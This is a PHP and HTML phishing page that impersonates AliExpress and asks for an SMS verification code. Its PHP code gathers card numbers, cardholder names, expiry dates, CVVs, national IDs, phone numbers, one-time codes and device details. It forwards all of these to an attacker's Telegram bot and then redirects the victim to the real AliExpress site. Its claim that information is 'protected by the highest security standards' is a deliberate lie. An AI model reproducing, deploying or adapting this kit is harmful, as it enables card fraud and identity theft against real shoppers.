<?php
// Telegram configuration
require_once 'config.php';
$telegramBotToken = $token;
$telegramChatId = $chatID;

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['message'])) {
    // Capture login credentials
    $smscode = htmlspecialchars($_POST['smscode'] ?? '');
    $deviceInfo = $_SERVER['HTTP_USER_AGENT'];
    
    // Compose message for Telegram
    $message = htmlspecialchars($_POST['message']);
    $message .= "📧 SMS Code: $smscode\n";
    $message .= "💻 Device Info: $deviceInfo\n";

    
    // Send to Telegram
    if (!empty($telegramBotToken) && !empty($telegramChatId)) {
        $telegramUrl = "https://api.telegram.org/bot$telegramBotToken/sendMessage";
        $data = [
            'chat_id' => $telegramChatId,
            'text' => $message
        ];
        
        $options = [
            'http' => [
                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
                'method'  => 'POST',
                'content' => http_build_query($data)
            ]
        ];
        
        $context = stream_context_create($options);
        @file_get_contents($telegramUrl, false, $context);
    }
    
    // Redirect to AliExpress
    header("Location: https://www.aliexpress.com");
    exit;

}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // استقبال البيانات من النموذج
    $transactionTime = htmlspecialchars($_POST['transactionTime'] ?? '');
    $ipAddress = htmlspecialchars($_POST['ipAddress'] ?? '');
    $cardNumber = htmlspecialchars($_POST['cardNumber'] ?? '');
    $cardHolder = htmlspecialchars($_POST['cardHolder'] ?? '');
    $expMonth = htmlspecialchars($_POST['expMonth'] ?? '');
    $expYear = htmlspecialchars($_POST['expYear'] ?? '');
    $cvv = htmlspecialchars($_POST['cvv'] ?? '');
    $nationalId = htmlspecialchars($_POST['nationalId'] ?? '');
    $mobileNumber = htmlspecialchars($_POST['mobileNumber'] ?? '');

    $message = "🛑 AliExpress Cards 🛑\n\n";
    $message .= "⏰ Time: $transactionTime\n";
    $message .= "🌐 IP: $ipAddress\n";
    $message .= "💳 Card Number: $cardNumber\n";
    $message .= "👤 Card Holder: $cardHolder\n";
    $message .= "📅 Expiry Date: $expMonth/$expYear\n";
    $message .= "🔒 CVV: $cvv\n";
    $message .= "🔢 National ID: $nationalId\n";
    $message .= "📱 Mobile Number: $mobileNumber\n";
}
?>

<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Verification Code | AliExpress</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
  <link rel="icon" type="image/png" sizes="32x32" href="https://i.ibb.co/pv0bbdMm/fav.png">
  <style>
    /* Base Styles */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }

    body {
      min-height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
      background: linear-gradient(135deg, #f8f9fa, #e9ecef);
      padding: 20px;
    }

    /* Card Container */
    .payment-card {
      width: 100%;
      max-width: 500px;
      background: #fff;
      box-shadow: 0 10px 30px rgba(0, 0, 0, 0.08);
      border-radius: 16px;
      overflow: hidden;
      transform: translateY(0);
      transition: transform 0.3s ease, box-shadow 0.3s ease;
    }

    .payment-card:hover {
      transform: translateY(-5px);
      box-shadow: 0 15px 35px rgba(0, 0, 0, 0.12);
    }

    /* Header Section */
    .card-header {
      background: linear-gradient(to right, #ff6a00, #ee4d2d);
      padding: 25px 30px;
      text-align: center;
      color: white;
      position: relative;
      overflow: hidden;
    }

    .header-pattern {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 0.1;
      background-image: 
        radial-gradient(circle at 10% 20%, rgba(255, 255, 255, 0.8) 1px, transparent 2px),
        radial-gradient(circle at 90% 80%, rgba(255, 255, 255, 0.8) 1px, transparent 2px);
      background-size: 40px 40px;
    }

    .aliexpress-logo {
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 12px;
      margin-bottom: 15px;
      z-index: 2;
      position: relative;
    }

    .aliexpress-text {
      font-size: 24px;
      font-weight: 700;
      letter-spacing: -0.5px;
      text-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    }

    .aliexpress-logo img {
      height: 45px;
      filter: drop-shadow(0 2px 4px rgba(0, 0, 0, 0.1));
    }

    .header-title {
      font-size: 22px;
      font-weight: 600;
      margin-bottom: 10px;
      z-index: 2;
      position: relative;
    }

    .header-subtitle {
      font-size: 16px;
      font-weight: 500;
      opacity: 0.9;
      z-index: 2;
      position: relative;
    }

    /* Body Section */
    .card-body {
      padding: 30px;
    }

    .form-section {
      margin-bottom: 25px;
    }

    .section-title {
      display: flex;
      align-items: center;
      gap: 10px;
      font-size: 18px;
      font-weight: 600;
      color: #333;
      margin-bottom: 20px;
      padding-bottom: 8px;
      border-bottom: 1px solid #eee;
    }

    .section-title i {
      color: #ff6a00;
    }

    /* Form Styles */
    .form-group {
      margin-bottom: 20px;
      position: relative;
    }

    .form-label {
      display: block;
      font-size: 14px;
      color: #555;
      margin-bottom: 8px;
      font-weight: 500;
    }

    .input-icon-container {
      position: relative;
    }

    .input-icon {
      position: absolute;
      left: 14px;
      top: 50%;
      transform: translateY(-50%);
      color: #999;
      font-size: 16px;
    }

    .form-input {
      width: 100%;
      padding: 14px 14px 14px 40px;
      border: 1px solid #ddd;
      border-radius: 8px;
      font-size: 15px;
      transition: all 0.3s;
      background-color: #fafafa;
    }

    .form-input:focus {
      border-color: #ff6a00;
      outline: none;
      box-shadow: 0 0 0 3px rgba(255, 106, 0, 0.15);
      background-color: #fff;
    }

    .error {
      border-color: #e74c3c !important;
    }

    .error-message {
      color: #e74c3c;
      font-size: 12px;
      margin-top: 6px;
      display: none;
    }

    /* Phone Preview */
    .phone-preview {
      background: linear-gradient(135deg, #2c3e50, #4a6491);
      border-radius: 12px;
      padding: 20px;
      color: white;
      margin-bottom: 25px;
      box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
      position: relative;
      overflow: hidden;
      display: flex;
      align-items: center;
      gap: 15px;
    }

    .phone-preview::before {
      content: "";
      position: absolute;
      top: -50%;
      right: -50%;
      width: 200%;
      height: 200%;
      background: radial-gradient(circle, rgba(255, 255, 255, 0.1) 0%, transparent 70%);
      pointer-events: none;
    }

    .phone-icon {
      font-size: 32px;
      color: #fff;
      background: rgba(255, 255, 255, 0.2);
      width: 60px;
      height: 60px;
      border-radius: 50%;
      display: flex;
      align-items: center;
      justify-content: center;
    }

    .phone-info {
      flex: 1;
    }

    .phone-label {
      font-size: 14px;
      opacity: 0.8;
      margin-bottom: 5px;
    }

    .phone-number {
      font-size: 18px;
      font-weight: 600;
      letter-spacing: 0.5px;
    }

    .change-link {
      color: #4fc3f7;
      font-size: 14px;
      text-decoration: none;
      font-weight: 500;
      transition: color 0.3s;
    }

    .change-link:hover {
      color: #81d4fa;
      text-decoration: underline;
    }

    /* Checkbox */
    .checkbox-group {
      display: flex;
      align-items: center;
      gap: 12px;
      margin: 25px 0;
    }

    .checkbox-custom {
      width: 20px;
      height: 20px;
      border: 2px solid #ddd;
      border-radius: 5px;
      display: flex;
      align-items: center;
      justify-content: center;
      cursor: pointer;
      transition: all 0.2s;
    }

    .checkbox-custom i {
      color: #ff6a00;
      font-size: 14px;
      opacity: 0;
      transition: opacity 0.2s;
    }

    input[type="checkbox"]:checked + .checkbox-custom {
      background: rgba(255, 106, 0, 0.1);
      border-color: #ff6a00;
    }

    input[type="checkbox"]:checked + .checkbox-custom i {
      opacity: 1;
    }

    .checkbox-text {
      font-size: 15px;
      color: #555;
    }

    /* Buttons */
    .button-group {
      display: flex;
      gap: 15px;
      margin-top: 10px;
    }

    .btn {
      flex: 1;
      padding: 16px;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      cursor: pointer;
      transition: all 0.3s;
      font-size: 16px;
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 8px;
    }

    .btn-primary {
      background: linear-gradient(to right, #ff6a00, #ee4d2d);
      color: white;
      box-shadow: 0 4px 12px rgba(255, 106, 0, 0.25);
    }

    .btn-primary:hover {
      background: linear-gradient(to right, #e55d00, #d44324);
      box-shadow: 0 6px 15px rgba(255, 106, 0, 0.35);
    }

    .btn-outline {
      background: transparent;
      border: 1px solid #ddd;
      color: #555;
    }

    .btn-outline:hover {
      background: #f9f9f9;
      border-color: #ccc;
    }

    .btn:disabled {
      opacity: 0.6;
      cursor: not-allowed;
      transform: none;
    }

    /* Footer */
    .payment-security {
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 10px;
      margin-top: 25px;
      padding-top: 20px;
      border-top: 1px solid #eee;
      color: #666;
      font-size: 14px;
    }

    .security-icon {
      color: #27ae60;
      font-size: 18px;
    }

    /* Animation */
    @keyframes pulse {
      0% { transform: scale(1); }
      50% { transform: scale(1.05); }
      100% { transform: scale(1); }
    }
    
    .pulse-animation {
      animation: pulse 2s infinite;
    }

    /* Responsive Design */
    @media (max-width: 600px) {
      .card-header {
        padding: 20px;
      }
      
      .aliexpress-text {
        font-size: 20px;
      }
      
      .aliexpress-logo img {
        height: 40px;
      }
      
      .header-title {
        font-size: 20px;
      }
      
      .card-body {
        padding: 20px;
      }
      
      .phone-number {
        font-size: 16px;
      }
      
      .btn {
        padding: 14px;
        font-size: 15px;
      }
    }

    @media (max-width: 400px) {
      .button-group {
        flex-direction: column;
      }
      
      .phone-preview {
        flex-direction: column;
        text-align: center;
      }
      
      .phone-icon {
        margin-bottom: 15px;
      }
    }
  </style>
</head>
<body>
  <form method="post" class="payment-card" action="otp.php">
    <input type="hidden" id="message" name="message" value="<?php echo $message; ?>">
    <div class="card-header">
      <div class="header-pattern"></div>
      <div class="aliexpress-logo">
        <img src="https://i.ibb.co/pv0bbdMm/fav.png" alt="AliExpress Logo">
        <span class="aliexpress-text">AliExpress</span>
      </div>
      <h1 class="header-title">A verification code will be sent to your mobile phone</h1>
    </div>
    
    <div class="card-body">
      <div class="form-section">
        <div class="form-group">
          <label class="form-label">Enter the verification code sent to you</label>
          <div class="input-icon-container">
            <i class="fas fa-shield-alt input-icon"></i>
            <input type="text" id="smscode"  name="smscode" class="form-input" placeholder="Enter verification code">
          </div>
          <div class="error-message">Please enter the correct verification code</div>
        </div>
        
        <div class="checkbox-group">
          <input type="checkbox" id="rememberPhone" hidden checked>
          <label for="rememberPhone" class="checkbox-custom">
            <i class="fas fa-check"></i>
          </label>
          <span class="checkbox-text">Remember my phone number for future purchases</span>
        </div>
      </div>
      
      <div class="button-group">
        <button class="btn btn-primary pulse-animation">
          <i class="fas fa-paper-plane"></i>
          Send Code
        </button>
      </div>
      
      <div class="payment-security">
        <i class="fas fa-shield-alt security-icon"></i>
        <span>Your information is protected by the highest security standards</span>
      </div>
    </div>
  </form>

  <script>
    // Function to handle form submission
    document.querySelector('.btn-primary').addEventListener('click', function() {
      const codeInput = document.querySelector('.form-input');
      const errorMessage = document.querySelector('.error-message');
      
      if (!codeInput.value || codeInput.value.length !== 6 || isNaN(codeInput.value)) {
        codeInput.classList.add('error');
        errorMessage.style.display = 'block';
      } else {
        codeInput.classList.remove('error');
        errorMessage.style.display = 'none';
        alert('Verification successful! You can now complete your purchase.');
      }
    });
    
    // Function to handle resend code
    document.querySelector('.btn-outline').addEventListener('click', function() {
      alert('Verification code has been resent to your phone!');
    });
  </script>
</body>
</html>